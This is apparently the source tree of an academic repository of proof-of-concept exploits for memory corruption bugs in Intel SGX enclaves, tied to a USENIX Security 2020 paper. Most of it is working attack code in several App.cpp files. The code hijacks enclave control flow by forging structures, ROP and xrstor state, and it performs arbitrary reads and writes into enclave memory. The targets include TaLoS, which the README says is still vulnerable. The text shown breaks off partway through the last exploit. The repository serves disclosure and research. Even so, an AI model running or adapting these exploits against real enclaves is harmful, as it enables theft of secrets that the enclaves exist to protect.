├── Intel-SGX-GMP-Demo-exploit ├── App │ └── App.cpp ├── EnclaveGmpTest.signed.so ├── Makefile └── enclave.signed.so ├── README.md ├── Rust-TLSClient-overlap-exploit ├── App │ └── App.cpp ├── Makefile ├── app └── enclave.signed.so ├── TaLoS-exploit-race-arbitrary-read ├── App │ └── App.cpp ├── Makefile └── enclave.signed.so ├── TaLoS-exploit-race-arbitrary-write ├── App │ └── App.cpp ├── Makefile └── enclave.signed.so ├── TaLoS-exploit ├── App │ └── App.cpp ├── Makefile └── enclave.signed.so └── WolfSSL-exploit ├── App └── App.cpp ├── Makefile ├── Wolfssl_Enclave.signed.so ├── app └── enclave.signed.so /Intel-SGX-GMP-Demo-exploit/App/App.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "sgx_edger8r.h" // sgx_ecall 7 | #include "sgx_urts.h" // sgx_create_enclave 8 | 9 | /* Global EID shared by multiple threads */ 10 | sgx_enclave_id_t global_eid = 0; 11 | 12 | int initialize_enclave(const char* enclave_filename) 13 | { 14 | if (global_eid != 0) 15 | return 0; 16 | 17 | sgx_launch_token_t token = {0}; 18 | int updated; 19 | sgx_status_t ret = sgx_create_enclave(enclave_filename, SGX_DEBUG_FLAG, &token, &updated, &global_eid, NULL); 20 | if (ret != SGX_SUCCESS) 21 | return -1; 22 | 23 | return 0; 24 | } 25 | 26 | void* enclave_base() { 27 | FILE* fp = fopen("/proc/self/smaps", "r"); 28 | if (fp == 0) return 0; 29 | char* line = 0; size_t len = 0; ssize_t read; 30 | 31 | // first isgx page (CODE, r_x) 32 | while((read = getline(&line, &len, fp)) != -1) 33 | if (strstr(line, "isgx")) 34 | return (void*)strtoll(line, NULL, 16); 35 | } 36 | 37 | int call_ecall(int ecall_idx, void* ms) 38 | { 39 | sgx_ecall(global_eid, ecall_idx, 0, ms); 40 | } 41 | 42 | int main(int argc, char** argv) 43 | { 44 | if (initialize_enclave("enclave.signed.so") < 0) 45 | return -1; 46 | 47 | 48 | uint64_t enclave_addr = (uint64_t)enclave_base(); 49 | 50 | static uint64_t b = 1; 51 | static 
uint64_t a = enclave_addr + 0x4ed23 - b; // BASE + asm_oret+13 - other_summand 52 | struct mpz_t { int alloc = 2; int size = 1; void* data; }; 53 | 54 | static uint64_t xregs_restore[] = { 55 | 0x37f, 0x0, 0x0, 0xffff00001f80, 56 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 57 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 58 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 59 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x8000000000000000, 60 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, // 0x240: end of systhetic state 61 | 62 | 0x0, 0xdeadbeef, // 4. ret after asm_ret: all registers and stack under control 63 | }; 64 | struct mpz_t_ext { int alloc = 2; int size = 1; void* data; 65 | char dummy[0x48] = { 0 }; 66 | uint64_t rcx = (uint64_t)xregs_restore + 0x240; // rsp+0x58 // 3. set rsp after asm_ret, must be near xregs_restore 67 | char dummy2[0x32] = { 0 }; 68 | void* xregs = xregs_restore; // rsp+0x98 // 2. set fake systhetic state for restore_xregs 69 | }; 70 | 71 | static struct mpz_t_ext ma; 72 | static struct mpz_t mb, mc; 73 | ma.data = &a; 74 | mb.data = &b; 75 | mc.data = (void*) (enclave_addr + 0x1000000 + 0x3655b8); // 1. overwrite ret addr in ecall 76 | //mc.data = (void*) ((enclave_tcs & ~0xFFFFFF) + 0x362c28); // 1. 
overwrite ret addr in ecall 77 | 78 | printf("%p\n", mc.data); 79 | 80 | struct ms1_t { mpz_t* c = &mc; mpz_t_ext* a = &ma; mpz_t* b = &mb; }; 81 | struct ms1_t ms1; 82 | call_ecall(1, (void*) &ms1); // e_mpz_add 83 | } 84 | -------------------------------------------------------------------------------- /Intel-SGX-GMP-Demo-exploit/EnclaveGmpTest.signed.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/Intel-SGX-GMP-Demo-exploit/EnclaveGmpTest.signed.so -------------------------------------------------------------------------------- /Intel-SGX-GMP-Demo-exploit/Makefile: -------------------------------------------------------------------------------- 1 | ######## SGX SDK Settings ######## 2 | 3 | SGX_SDK ?= /opt/intel/sgxsdk 4 | SGX_MODE ?= HW 5 | SGX_ARCH ?= x64 6 | SGX_DEBUG ?= 1 7 | 8 | ifeq ($(shell getconf LONG_BIT), 32) 9 | SGX_ARCH := x86 10 | else ifeq ($(findstring -m32, $(CXXFLAGS)), -m32) 11 | SGX_ARCH := x86 12 | endif 13 | 14 | ifeq ($(SGX_ARCH), x86) 15 | SGX_COMMON_CFLAGS := -m32 16 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib 17 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x86/sgx_sign 18 | SGX_EDGER8R := $(SGX_SDK)/bin/x86/sgx_edger8r 19 | else 20 | SGX_COMMON_CFLAGS := -m64 21 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib64 22 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x64/sgx_sign 23 | SGX_EDGER8R := $(SGX_SDK)/bin/x64/sgx_edger8r 24 | endif 25 | 26 | ifeq ($(SGX_DEBUG), 1) 27 | ifeq ($(SGX_PRERELEASE), 1) 28 | $(error Cannot set SGX_DEBUG and SGX_PRERELEASE at the same time!!) 
29 | endif 30 | endif 31 | 32 | ifeq ($(SGX_DEBUG), 1) 33 | SGX_COMMON_CFLAGS += -O0 -g 34 | else 35 | SGX_COMMON_CFLAGS += -O2 36 | endif 37 | 38 | ######## App Settings ######## 39 | 40 | ifneq ($(SGX_MODE), HW) 41 | Urts_Library_Name := sgx_urts_sim 42 | else 43 | Urts_Library_Name := sgx_urts 44 | endif 45 | 46 | App_Cpp_Files := App/App.cpp 47 | App_Include_Paths := -IInclude -IApp -I$(SGX_SDK)/include 48 | 49 | App_C_Flags := $(SGX_COMMON_CFLAGS) -fPIC -Wno-attributes $(App_Include_Paths) 50 | 51 | # Three configuration modes - Debug, prerelease, release 52 | # Debug - Macro DEBUG enabled. 53 | # Prerelease - Macro NDEBUG and EDEBUG enabled. 54 | # Release - Macro NDEBUG enabled. 55 | ifeq ($(SGX_DEBUG), 1) 56 | App_C_Flags += -DDEBUG -UNDEBUG -UEDEBUG 57 | else ifeq ($(SGX_PRERELEASE), 1) 58 | App_C_Flags += -DNDEBUG -DEDEBUG -UDEBUG 59 | else 60 | App_C_Flags += -DNDEBUG -UEDEBUG -UDEBUG 61 | endif 62 | 63 | App_Cpp_Flags := $(App_C_Flags) -std=c++11 64 | App_Link_Flags := $(SGX_COMMON_CFLAGS) -L$(SGX_LIBRARY_PATH) -l$(Urts_Library_Name) -lpthread 65 | 66 | ifneq ($(SGX_MODE), HW) 67 | App_Link_Flags += -lsgx_uae_service_sim 68 | else 69 | App_Link_Flags += -lsgx_uae_service -ldl 70 | endif 71 | 72 | App_Cpp_Objects := $(App_Cpp_Files:.cpp=.o) 73 | 74 | App_Name := app 75 | 76 | ######## App Objects ######## 77 | 78 | App/%.o: App/%.cpp 79 | @$(CXX) $(App_Cpp_Flags) -c $< -o $@ 80 | @echo "CXX <= $<" 81 | 82 | $(App_Name): $(App_Cpp_Objects) 83 | @$(CXX) $^ -o $@ $(App_Link_Flags) 84 | @echo "LINK => $@" 85 | 86 | .config_$(Build_Mode)_$(SGX_ARCH): 87 | @rm -f .config_* $(App_Name) $(Enclave_Name) $(Signed_Enclave_Name) $(App_Cpp_Objects) App/Enclave_u.* $(Enclave_Cpp_Objects) Enclave/Enclave_t.* 88 | @touch .config_$(Build_Mode)_$(SGX_ARCH) 89 | -------------------------------------------------------------------------------- /Intel-SGX-GMP-Demo-exploit/enclave.signed.so: -------------------------------------------------------------------------------- 1 | 
EnclaveGmpTest.signed.so -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # TeeRex SGX Exploits 2 | 3 | This repository contains several exploits that we developed in the course of our research on memory corruption bugs in SGX enclaves. 4 | The full results of our research are published at [USENIX Security 2020](https://www.usenix.org/conference/usenixsecurity20/presentation/cloosters). 5 | 6 | | Project | Vulnerable Version | Exploit | Comment | 7 | |--|--|--|--| 8 | | [Intel GMP Demo](https://github.com/intel/sgx-gmp-demo) | [9533574](https://github.com/intel/sgx-gmp-demo/tree/9533574f95b97ea08adb6724d8be797c53119dac) | [Intel SGX GMP Demo Exploit](./Intel-SGX-GMP-Demo-exploit) | ✔️ [Fixed](https://github.com/intel/sgx-gmp-demo/commit/0491317b4112b06e16b3f3b1c07b06e400b32391) | 9 | | [Rust SGX SDK TLSClient](https://github.com/apache/incubator-teaclave-sgx-sdk) | [v1.0.9](https://github.com/apache/incubator-teaclave-sgx-sdk/tree/v1.0.9) | [Rust TLSClient Overlap Exploit](./Rust-TLSClient-overlap-exploit) | ✔️ [Fixed](https://github.com/apache/incubator-teaclave-sgx-sdk/commit/f975a19982740d5d2e878b595c1be5d1a1a31ecb) | 10 | | [WolfSSL](https://github.com/wolfSSL/wolfssl-examples) | [d330c53](https://github.com/wolfSSL/wolfssl-examples/tree/d330c53baff52fdf4338619cd4f82ae25c1bc294) | [WolfSSL Exploit](./WolfSSL-exploit) | ✔️ [Fixed](https://github.com/wolfSSL/wolfssl-examples/commit/1862c108d7e3be47a3d6fe18f406df444ae36e6e#diff-f23aff9e4544c233135f934bc7478f11) | 11 | | [TaLoS](https://github.com/lsds/TaLoS) | all | - [TaLoS Exploit](./TaLoS-exploit)
- [TaLoS Arbitrary Read](./TaLoS-exploit-race-arbitrary-read)
- [TaLoS Arbitrary Write](./TaLoS-exploit-race-arbitrary-write) | ❌ Not fixed, Project not maintained: [Issue](https://github.com/lsds/TaLoS/issues/18) | 12 | | Synaptics SynaTEE Driver | 5.2.3535.26 | Exploit not public | ✔️ Fixed ([CVE-2019-18619](https://www.cve.org/CVERecord?id=CVE-2019-18619)) | 13 | | Goodix Fingerprint Driver | 2.1.32.200 | Exploit not public | ✔️ Fixed ([DSA-2020-138](https://www.dell.com/support/kbdoc/de-de/000131724/dsa-2020-138-dell-client-platform-security-update-for-goodix-fingerprint-sensor-driver-vulnerability)) | 14 | 15 | 16 | ## Running the Exploits 17 | ### Prerequisites 18 | Install the [Intel SGX driver](https://github.com/intel/linux-sgx-driver/) and the [Intel SGX SDK](https://github.com/intel/linux-sgx/). 19 | 20 | ### Build and Run 21 | Note: The PoC exploits contain hard-coded addresses that depend on the compiled enclaves included in the repository. 22 | 23 | The exploit code follows the make principles of the SGX SDK: 24 | 25 | * Use `make` in the respective directories to compile the exploit 26 | * Run the exploit using: `./app` 27 | 28 | All exploits overwrite the instruction pointer in the enclave, some also include follow up code to also control the stack pointer. Therefore there are different outputs when executing the exploits: Some will return a simple value to indicate the result, others just crash after the exploit hijacked the control flow and jumped to a bogus address. *None of the PoC exploits will harm you or your setup in any way!* 29 | 30 | ## Exploit Concepts 31 | ### [Intel SGX GMP Demo Exploit](./Intel-SGX-GMP-Demo-exploit) 32 | The [Intel GMP Demo](https://github.com/intel/sgx-gmp-demo) shows how to use the GMP library inside an SGX enclave. 33 | Insufficient input validation made it possible to read and write arbitrary memory including the secure region. 
34 | 35 | ### [Rust TLSClient Overlap Exploit](./Rust-TLSClient-overlap-exploit) 36 | The [Rust SGX SDK](https://github.com/apache/incubator-teaclave-sgx-sdk) provides a compatibility layer to enable enclave development using the memory-safe Rust-language. The demonstrative implementation of a [TLS Client/Server application](https://github.com/apache/incubator-teaclave-sgx-sdk/tree/master/samplecode/tls/tlsclient) contained a design flaw that can be used to hijack the control flow. 37 | 38 | ### [WolfSSL Exploit](./WolfSSL-exploit) 39 | [WolfSSL](https://github.com/wolfSSL/wolfssl-examples) is a portable SSL/TLS library that can be used in an SGX enclave. The SGX layer contained a conceptual error that allowed an attacker to hijack the control flow. 40 | 41 | ### TaLoS Exploits 42 | ⚠️ `Warning: The project is unmaintained and is still vulnerable!` 43 | 44 | The [TaLoS project](https://github.com/lsds/TaLoS) provides TLS termination for nginx or apache inside an SGX enclave. We demonstrate: 45 | 46 | * **[Control Flow Hijacking](./TaLoS-exploit)** using an insufficiently validated pointer, 47 | * **[Arbitrary Read](./TaLoS-exploit-race-arbitrary-read)** using a NULL-pointer dereference, 48 | * **[Arbitrary Write](./TaLoS-exploit-race-arbitrary-write)** using a race condition. 49 | 50 | 51 | 52 | # Citing in Academic Work 53 | 54 | These PoC exploits are part of the research that we present in our [USENIX Security 2020 paper](https://www.usenix.org/conference/usenixsecurity20/presentation/cloosters). 
55 | If you want to refer to these exploits or our paper in academic work, please use the following BibTeX entry for citation: 56 | 57 | ```bibtex 58 | @InProceedings{cloosters2020teerex, 59 | title = "{TeeRex:} Discovery and Exploitation of Memory Corruption Vulnerabilities in {SGX} Enclaves", 60 | author = "Tobias Cloosters and Michael Rodler and Lucas Davi", 61 | booktitle = "29th {USENIX} Security Symposium ({USENIX} Security '20)", 62 | year = "2020", 63 | } 64 | ``` 65 | -------------------------------------------------------------------------------- /Rust-TLSClient-overlap-exploit/App/App.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "sgx_edger8r.h" // sgx_ecall 7 | #include "sgx_urts.h" // sgx_create_enclave 8 | 9 | sgx_enclave_id_t global_eid = 0; 10 | 11 | int initialize_enclave(const char* enclave_filename) 12 | { 13 | if (global_eid != 0) 14 | return 0; 15 | 16 | sgx_launch_token_t token = {0}; 17 | int updated; 18 | sgx_status_t ret = sgx_create_enclave(enclave_filename, SGX_DEBUG_FLAG, &token, &updated, &global_eid, NULL); 19 | if (ret != SGX_SUCCESS) 20 | return -1; 21 | 22 | return 0; 23 | } 24 | 25 | void* enclave_base() { 26 | FILE* fp = fopen("/proc/self/smaps", "r"); 27 | if (fp == 0) return 0; 28 | char* line = 0; size_t len = 0; ssize_t read; 29 | 30 | // first isgx page (CODE, r_x) 31 | while((read = getline(&line, &len, fp)) != -1) 32 | if (strstr(line, "isgx")) 33 | return (void*)strtoll(line, NULL, 16); 34 | } 35 | 36 | int call_ecall(int ecall_idx, void* ms) 37 | { 38 | sgx_ecall(global_eid, ecall_idx, 0, ms); 39 | } 40 | 41 | int main(int argc, char** argv) 42 | { 43 | if (initialize_enclave("enclave.signed.so") < 0) 44 | return -1; 45 | 46 | uint64_t* base = (uint64_t*) enclave_base(); 47 | void* page = mmap(base - 0x1000/8, 0x1000, 7, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0); 48 | printf("%p %p\n", base, page); 49 | 50 | 
size_t BUFFER_SIZE = 0x4c8 / sizeof(uint64_t); 51 | 52 | uint64_t* buffer = (uint64_t*) base - BUFFER_SIZE + 1; 53 | for (uint64_t i = 0; i < BUFFER_SIZE - 1; ++i) 54 | buffer[i] = i << 32; 55 | 56 | // (1) survive free call 57 | buffer[0] = (uint64_t) (buffer + 5); 58 | buffer[1] = (uint64_t) (buffer + 10); 59 | buffer[9] = 0; 60 | buffer[8] = (uint64_t) (buffer + 20); 61 | buffer[20+0x40/8] = 0; 62 | buffer[5] = (uint64_t) (buffer + 30) + 1; 63 | 64 | // (2) jmp target: asm_oret+13 65 | // buffer[0x1e] = 0xDEADC0DE; 66 | buffer[0x1e] = (uint64_t) base + 0x2235de + 13; // asm_oret+13 67 | 68 | static uint64_t new_stack[0x100]; 69 | static uint64_t xregs_restore[] __attribute__ ((aligned(64))) = { 70 | // (4) SYNTHETIC STATE (rstor) 71 | 0x37f, 0x0, 0x0, 0xffff00001f80, 72 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 73 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 74 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 75 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x8000000000000000, 76 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, // 0x240: end of systhetic state 77 | 78 | // (6) ROP stack: 79 | // pop rbp, ret 80 | 0x0, 0xDEADC0DE, // ... 
ROP chain (7) 81 | }; 82 | new_stack[0x98/8] = (uint64_t) xregs_restore; // (4) xrstor 83 | new_stack[0x58/8] = (uint64_t) xregs_restore + 0x240; // (5) final rsp 84 | 85 | new_stack[0x38/8] = 0x1; 86 | new_stack[0x38/8] = 0x2; 87 | 88 | uint64_t ms[2] = { (uint64_t) buffer, (uint64_t) new_stack /* (3) rstor stack */}; 89 | call_ecall(5, ms); // tls_client_close(session) 90 | } 91 | -------------------------------------------------------------------------------- /Rust-TLSClient-overlap-exploit/Makefile: -------------------------------------------------------------------------------- 1 | ######## SGX SDK Settings ######## 2 | 3 | SGX_SDK ?= /opt/intel/sgxsdk 4 | SGX_MODE ?= HW 5 | SGX_ARCH ?= x64 6 | SGX_DEBUG ?= 1 7 | 8 | ifeq ($(shell getconf LONG_BIT), 32) 9 | SGX_ARCH := x86 10 | else ifeq ($(findstring -m32, $(CXXFLAGS)), -m32) 11 | SGX_ARCH := x86 12 | endif 13 | 14 | ifeq ($(SGX_ARCH), x86) 15 | SGX_COMMON_CFLAGS := -m32 16 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib 17 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x86/sgx_sign 18 | SGX_EDGER8R := $(SGX_SDK)/bin/x86/sgx_edger8r 19 | else 20 | SGX_COMMON_CFLAGS := -m64 21 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib64 22 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x64/sgx_sign 23 | SGX_EDGER8R := $(SGX_SDK)/bin/x64/sgx_edger8r 24 | endif 25 | 26 | ifeq ($(SGX_DEBUG), 1) 27 | ifeq ($(SGX_PRERELEASE), 1) 28 | $(error Cannot set SGX_DEBUG and SGX_PRERELEASE at the same time!!) 
29 | endif 30 | endif 31 | 32 | ifeq ($(SGX_DEBUG), 1) 33 | SGX_COMMON_CFLAGS += -O0 -g 34 | else 35 | SGX_COMMON_CFLAGS += -O2 36 | endif 37 | 38 | ######## App Settings ######## 39 | 40 | ifneq ($(SGX_MODE), HW) 41 | Urts_Library_Name := sgx_urts_sim 42 | else 43 | Urts_Library_Name := sgx_urts 44 | endif 45 | 46 | App_Cpp_Files := App/App.cpp 47 | App_Include_Paths := -IInclude -IApp -I$(SGX_SDK)/include 48 | 49 | App_C_Flags := $(SGX_COMMON_CFLAGS) -fPIC -Wno-attributes $(App_Include_Paths) 50 | 51 | # Three configuration modes - Debug, prerelease, release 52 | # Debug - Macro DEBUG enabled. 53 | # Prerelease - Macro NDEBUG and EDEBUG enabled. 54 | # Release - Macro NDEBUG enabled. 55 | ifeq ($(SGX_DEBUG), 1) 56 | App_C_Flags += -DDEBUG -UNDEBUG -UEDEBUG 57 | else ifeq ($(SGX_PRERELEASE), 1) 58 | App_C_Flags += -DNDEBUG -DEDEBUG -UDEBUG 59 | else 60 | App_C_Flags += -DNDEBUG -UEDEBUG -UDEBUG 61 | endif 62 | 63 | App_Cpp_Flags := $(App_C_Flags) -std=c++11 64 | App_Link_Flags := $(SGX_COMMON_CFLAGS) -L$(SGX_LIBRARY_PATH) -l$(Urts_Library_Name) -lpthread 65 | 66 | ifneq ($(SGX_MODE), HW) 67 | App_Link_Flags += -lsgx_uae_service_sim 68 | else 69 | App_Link_Flags += -lsgx_uae_service 70 | endif 71 | 72 | App_Cpp_Objects := $(App_Cpp_Files:.cpp=.o) 73 | 74 | App_Name := app 75 | 76 | ######## App Objects ######## 77 | 78 | App/%.o: App/%.cpp 79 | @$(CXX) $(App_Cpp_Flags) -c $< -o $@ 80 | @echo "CXX <= $<" 81 | 82 | $(App_Name): $(App_Cpp_Objects) 83 | @$(CXX) $^ -o $@ $(App_Link_Flags) 84 | @echo "LINK => $@" 85 | 86 | .config_$(Build_Mode)_$(SGX_ARCH): 87 | @rm -f .config_* $(App_Name) $(App_Cpp_Objects) App/Enclave_u.* $(Enclave_Cpp_Objects) Enclave/Enclave_t.* 88 | @touch .config_$(Build_Mode)_$(SGX_ARCH) 89 | 90 | -------------------------------------------------------------------------------- /Rust-TLSClient-overlap-exploit/app: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/Rust-TLSClient-overlap-exploit/app -------------------------------------------------------------------------------- /Rust-TLSClient-overlap-exploit/enclave.signed.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/Rust-TLSClient-overlap-exploit/enclave.signed.so -------------------------------------------------------------------------------- /TaLoS-exploit-race-arbitrary-read/App/App.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include 5 | #include 6 | 7 | // mmap 8 | #include 9 | #include 10 | #include 11 | 12 | #include "sgx_edger8r.h" // sgx_ecall 13 | #include "sgx_urts.h" // sgx_create_enclave 14 | 15 | /* Global EID shared by multiple threads */ 16 | sgx_enclave_id_t global_eid = 0; 17 | 18 | int initialize_enclave(const char* enclave_filename) 19 | { 20 | if (global_eid != 0) 21 | return 0; 22 | 23 | sgx_launch_token_t token = {0}; 24 | int updated; 25 | sgx_status_t ret = sgx_create_enclave(enclave_filename, SGX_DEBUG_FLAG, &token, &updated, &global_eid, NULL); 26 | if (ret != SGX_SUCCESS) 27 | return -1; 28 | 29 | return 0; 30 | } 31 | 32 | void* enclave_base() { 33 | FILE* fp = fopen("/proc/self/smaps", "r"); 34 | if (fp == 0) return 0; 35 | char* line = 0; size_t len = 0; ssize_t read; 36 | 37 | // first isgx page (CODE, r_x) 38 | while((read = getline(&line, &len, fp)) != -1) 39 | if (strstr(line, "isgx")) 40 | return (void*)strtoll(line, NULL, 16); 41 | } 42 | 43 | int call_ecall(int ecall_idx, void* ms) 44 | { 45 | sgx_ecall(global_eid, ecall_idx, 0, ms); 46 | } 47 | 48 | /* 49 | ***************************************************** 50 | * ALLOW ZERO PAGE: sudo sysctl vm.mmap_min_addr=0 51 | 
***************************************************** 52 | */ 53 | int main(int argc, char** argv) 54 | { 55 | if (initialize_enclave("enclave.signed.so") < 0) 56 | return -1; 57 | uint64_t* base = (uint64_t*) enclave_base(); 58 | 59 | // 1. Map the Zero Page. 60 | void *zero = mmap(0, 0x10000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); 61 | if (zero == (void*)-1) { 62 | printf("sudo sysctl vm.mmap_min_addr=0\n"); 63 | return -1; 64 | } 65 | 66 | uint64_t arbr = 0x57eac18; // arbitrary read address in enclave 67 | 68 | // 2. This ECall will copy the value from the specified address to the Zero Page. 69 | uint64_t ms[] = { 0, (uint64_t)base + arbr - 0x18 }; 70 | // public BIO *ecall_SSL_get_rbio([user_check] const SSL *s); 71 | call_ecall(56, ms); 72 | 73 | // 3. Print the disclosed value from address 0x18. 74 | printf("*%p = %llx\n", arbr, *(uint64_t*)0x18); 75 | } 76 | -------------------------------------------------------------------------------- /TaLoS-exploit-race-arbitrary-read/Makefile: -------------------------------------------------------------------------------- 1 | ######## SGX SDK Settings ######## 2 | 3 | SGX_SDK ?= /opt/intel/sgxsdk 4 | SGX_MODE ?= HW 5 | SGX_ARCH ?= x64 6 | SGX_DEBUG ?= 1 7 | 8 | ifeq ($(shell getconf LONG_BIT), 32) 9 | SGX_ARCH := x86 10 | else ifeq ($(findstring -m32, $(CXXFLAGS)), -m32) 11 | SGX_ARCH := x86 12 | endif 13 | 14 | ifeq ($(SGX_ARCH), x86) 15 | SGX_COMMON_CFLAGS := -m32 16 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib 17 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x86/sgx_sign 18 | SGX_EDGER8R := $(SGX_SDK)/bin/x86/sgx_edger8r 19 | else 20 | SGX_COMMON_CFLAGS := -m64 21 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib64 22 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x64/sgx_sign 23 | SGX_EDGER8R := $(SGX_SDK)/bin/x64/sgx_edger8r 24 | endif 25 | 26 | ifeq ($(SGX_DEBUG), 1) 27 | ifeq ($(SGX_PRERELEASE), 1) 28 | $(error Cannot set SGX_DEBUG and SGX_PRERELEASE at the same time!!) 
29 | endif 30 | endif 31 | 32 | ifeq ($(SGX_DEBUG), 1) 33 | SGX_COMMON_CFLAGS += -O0 -g 34 | else 35 | SGX_COMMON_CFLAGS += -O2 36 | endif 37 | 38 | ######## App Settings ######## 39 | 40 | ifneq ($(SGX_MODE), HW) 41 | Urts_Library_Name := sgx_urts_sim 42 | else 43 | Urts_Library_Name := sgx_urts 44 | endif 45 | 46 | App_Cpp_Files := App/App.cpp 47 | App_Include_Paths := -IInclude -IApp -I$(SGX_SDK)/include 48 | 49 | App_C_Flags := $(SGX_COMMON_CFLAGS) -fPIC -Wno-attributes $(App_Include_Paths) 50 | 51 | # Three configuration modes - Debug, prerelease, release 52 | # Debug - Macro DEBUG enabled. 53 | # Prerelease - Macro NDEBUG and EDEBUG enabled. 54 | # Release - Macro NDEBUG enabled. 55 | ifeq ($(SGX_DEBUG), 1) 56 | App_C_Flags += -DDEBUG -UNDEBUG -UEDEBUG 57 | else ifeq ($(SGX_PRERELEASE), 1) 58 | App_C_Flags += -DNDEBUG -DEDEBUG -UDEBUG 59 | else 60 | App_C_Flags += -DNDEBUG -UEDEBUG -UDEBUG 61 | endif 62 | 63 | App_Cpp_Flags := $(App_C_Flags) -std=c++11 64 | App_Link_Flags := $(SGX_COMMON_CFLAGS) -L$(SGX_LIBRARY_PATH) -l$(Urts_Library_Name) -lpthread 65 | 66 | ifneq ($(SGX_MODE), HW) 67 | App_Link_Flags += -lsgx_uae_service_sim 68 | else 69 | App_Link_Flags += -lsgx_uae_service 70 | endif 71 | 72 | App_Cpp_Objects := $(App_Cpp_Files:.cpp=.o) 73 | 74 | App_Name := app 75 | 76 | ######## App Objects ######## 77 | 78 | App/%.o: App/%.cpp 79 | @$(CXX) $(App_Cpp_Flags) -c $< -o $@ 80 | @echo "CXX <= $<" 81 | 82 | $(App_Name): $(App_Cpp_Objects) 83 | @$(CXX) $^ -o $@ $(App_Link_Flags) 84 | @echo "LINK => $@" 85 | 86 | .config_$(Build_Mode)_$(SGX_ARCH): 87 | @rm -f .config_* $(App_Name) $(App_Cpp_Objects) App/Enclave_u.* $(Enclave_Cpp_Objects) Enclave/Enclave_t.* 88 | @touch .config_$(Build_Mode)_$(SGX_ARCH) 89 | 90 | -------------------------------------------------------------------------------- /TaLoS-exploit-race-arbitrary-read/enclave.signed.so: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/TaLoS-exploit-race-arbitrary-read/enclave.signed.so -------------------------------------------------------------------------------- /TaLoS-exploit-race-arbitrary-write/App/App.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include 5 | #include 6 | 7 | // mmap 8 | #include 9 | #include 10 | #include 11 | 12 | #include "sgx_edger8r.h" // sgx_ecall 13 | #include "sgx_urts.h" // sgx_create_enclave 14 | 15 | /* Global EID shared by multiple threads */ 16 | sgx_enclave_id_t global_eid = 0; 17 | 18 | int initialize_enclave(const char* enclave_filename) 19 | { 20 | if (global_eid != 0) 21 | return 0; 22 | 23 | sgx_launch_token_t token = {0}; 24 | int updated; 25 | sgx_status_t ret = sgx_create_enclave(enclave_filename, SGX_DEBUG_FLAG, &token, &updated, &global_eid, NULL); 26 | if (ret != SGX_SUCCESS) 27 | return -1; 28 | 29 | return 0; 30 | } 31 | 32 | void* enclave_base() { 33 | FILE* fp = fopen("/proc/self/smaps", "r"); 34 | if (fp == 0) return 0; 35 | char* line = 0; size_t len = 0; ssize_t read; 36 | 37 | // first isgx page (CODE, r_x) 38 | while((read = getline(&line, &len, fp)) != -1) 39 | if (strstr(line, "isgx")) 40 | return (void*)strtoll(line, NULL, 16); 41 | } 42 | 43 | int call_ecall(int ecall_idx, void* ms) 44 | { 45 | sgx_ecall(global_eid, ecall_idx, 0, ms); 46 | } 47 | 48 | // this function is run by the second thread 49 | void* thread(void *) 50 | { 51 | printf("RUNNING\n"); 52 | while (true) { 53 | *(uint64_t*)0x18 = 0xdeadc0de; // SSL->wbio 54 | } 55 | } 56 | 57 | /* 58 | ***************************************************** 59 | * ALLOW ZERO PAGE: sudo sysctl vm.mmap_min_addr=0 60 | ***************************************************** 61 | */ 62 | int main(int argc, char** argv) 63 | { 64 | if (initialize_enclave("enclave.signed.so") < 0) 65 | return -1; 66 | uint64_t* base = 
